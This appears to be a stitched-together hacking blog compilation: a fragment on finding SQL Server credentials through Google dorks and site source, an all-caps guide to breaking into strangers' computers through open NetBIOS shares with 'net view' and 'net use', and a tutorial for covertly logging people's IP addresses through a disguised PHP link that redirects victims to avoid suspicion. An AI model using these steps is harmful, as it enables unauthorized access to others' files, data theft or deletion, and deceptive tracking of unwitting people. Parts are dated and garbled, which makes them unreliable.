The reverse engineering trick looks for software exploits, memory corruption weaknesses and so on. In this sample chapter from the excellent book Exploiting Software: How to Break Code by Greg Hoglund and Gary McGraw, you'll find a discussion about reverse engineering ploys.



9. Google hacks



Google hacks use the extraordinary power of the Google search engine to ferret out SQL Server errors -- such as "Incorrect syntax near" -- leaking from publicly accessible systems. Several Google queries are available at Johnny Long's Google Hacking Database. (Look in the sections titled Error Messages and Files containing passwords.) Hackers use Google to find passwords, vulnerabilities in Web servers, underlying operating systems, publicly available procedures and more that they can use to further compromise a SQL Server system. Combining these queries with Web site names via Google's 'site:' operator often turns up juicy info you never imagined you could unearth.



10. Perusing Web site source code



Source code can also turn up information that may lead to a SQL Server break in. Specifically, developers may store SQL Server authentication information in ASP scripts to simplify the authentication process. A manual assessment or Google could uncover this information in a split second.

Netbios Hacking

THIS NETBIOS HACKING GUIDE WILL TELL YOU ABOUT HACKING REMOTE COMPUTER AND GAINING ACCESS TO IT’S HARD-DISK OR PRINTER.NETBIOS HACK IS THE EASIEST WAY TO BREAK INTO A REMOTE COMPUTER.




STEP-BY-STEP NETBIOS HACKING PROCEDURE



1.Open command prompt



2. In the command prompt use the “net view” command

( OR YOU CAN ALSO USE “NB Scanner” OPTION IN “IP-TOOLS” SOFTWARE BY ENTERING RANGE OF IP ADDRESSS.BY THIS METHOD YOU CAN SCAN NUMBER OF COMPUTERS AT A TIME).



Example: C:\>net view //219.64.55.112



The above is an example for operation using command prompt.”net view” is one of the netbios command to view the shared resources of the remote computer.Here “219.64.55.112″ is an IP address of remote computer that is to be hacked through Netbios.You have to substitute a vlaid IP address in it’s place.If succeeded a list of HARD-DISK DRIVES & PRINTERS are shown.If not an error message is displayed. So repeat the procedure 2 with a different IP address.



3. After succeeding, use the “net use” command in the command prompt.The “net use” is another netbios command which makes it possible to hack remote drives or printers.



Example-1:

C:\>net use D: \\219.64.55.112\F

Example-2:

C:\>net use G: \\219.64.55.112\SharedDocs

Example-3:

C:\>net use I: file://219.64.55.112/Myprint



NOTE: In Examples 1,2 & 3, D:,G: & I: are the Network Drive Names that are to be created on your computer to access remote computer’s hard-disk.



NOTE: GIVE DRIVE NAMES THAT ARE NOT USED BY ANY OTHER DRIVES INCLUDING HARD-DISK DRIVES,FLOPPY DRIVES AND ROM-DRIVES ON YOUR COMPUTER.THAT IS IF YOU HAVE C: & D: AS HARD DIRVES, A: AS FLOPPY DIVE AND E: AS CD-DRIVE, GIVE F: AS YOUR SHARED DRIVE IN THE COMMAND PROMPT



F:,”SharedDocs” are the names of remote computer’s hard-disk’s drives that you want to hack. “Myprint” is the name of remote computer’s printer.These are displayed after giving “net use” command. “219.64.55.112″ is the IP address of remote computer that you want to hack.



4. After succeeding your computer will give a message that “The command completed successfully“. Once you get the above message you are only one step away from hacking the computer.



Now open “My Computer” you will see a new “Hard-Disk drive”(Shared) with the specified name.You can open it and access remote computer’s Hard-Drive.You can copy files,music,folders etc. from victim’s hard-drive.You can delete/modify data on victim’s hard-drive only if WRITE-ACCESS is enabled on victim’s system.You can access files\folders quickly through “Command Prompt”.



NOTE: If Remote Computer’s Firewall Is Enabled Your Computer Will Not Succeed In Gaining Access To Remote Computer Through Netbios.That is Netbios Hacking Is Not Possible In This Situation.(An Error Message Is Displayed).So Repeat The Procedure 2,3 With Different IP Address.

How to Find the IP Address of a Remote Computer

Most of you may be curious to know how to find the IP address of your friend’s computer or to find the IP address of the person with whom you are chatting in Yahoo messenger or Gtalk. In this post I’ll show you how to find the IP address of a remote computer in simple steps.

I have created a PHP script to make it easier for you to find the IP address of the remote computer of your choice. Here is a step-by-step process to find out the IP address.

1. Download the IP Finder script (IP_Finder.ZIP) that I have created.
2. Open a new account in X10Hosting (or any free host that supports PHP).
3. Extract the IP_Finder.ZIP file and upload the two files ip.php and ip_log.txt into the root folder of your hosting account using the File Manager.
4. You can rename the ip.php to any name of your choice.
5. Set the permission to 777 on ip_log.txt.
Now you are all set to find the IP address of your friend or any remote computer of your choice. All you have to do is send the link of ip.php to your friend or the person with whom you’re chatting. Once the person click’s on the link, his/her IP address is recorded in the file ip_log.txt.



For your better understanding let’s take up the following example.

Suppose you open a new account in X10hosting.com with the subdomain as abc, then your IP Finder link would be
http://abc.x10hosting.com/ip.php


You have to send the above link to you friend via email or while chatting and ask him to visit that link. Once your friend clicks on the link, his IP address will be recorded along with the Date and Time in the ip_log.txt file. After recording the IP address, the script will redirect the person to google.com so as to avoid any suspicion.



To find the recorded IP address check the logs using the following link.

http://abc.x10hosting.com/ip_log.php

The sample log will be in the following format



79.92.144.237 Thursday 07th of May 2009 05:31:27 PM

59.45.144.237 Thursday 07th of May 2009 05:31:28 PM

123.92.144.237 Thursday 07th of May 2009 05:31:31 PM



NOTE: You have to replace abc with your subdomain name.



I hope this helps. Express your opinion and suggestions through comments